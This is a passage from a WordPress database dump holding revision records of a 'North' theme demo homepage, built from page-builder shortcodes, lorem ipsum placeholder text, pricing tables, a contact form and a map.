2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309b72c-bddc\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home7','','inherit','closed','closed','','721-revision-v1','','','2014-07-15 13:13:51','2014-07-15 13:13:51','',721,'http://highperformingstudent.com/2014/07/15/721-revision-v1/',0,'revision','',0),(728,1,'2014-07-15 13:18:48','2014-07-15 13:18:48','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"545,546,547\" text_static=\"The goods you need now\" style=\"style1\" posts_nr=\"6\" bg_overlay=\"dots\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"WE CREATE AWESOME THEMES!,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452942369{padding-bottom: 50px !important;background-color: #1a1a1a !important;border-color: #eeeeee !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709987402{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709992519{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406710000236{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506326298{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dots_dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452967628{padding-bottom: 70px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405451859507{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1a1a1a !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452979786{margin-bottom: -15px !important;padding-bottom: 0px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409773992514{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309a875-582a\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"alignleft size-full wp-image-926\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309a875-582a\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309a875-582a\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452992592{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405454385261{background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" customcolor_heading=\"#303030\" customcolor_text=\"#2d2d2d\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE 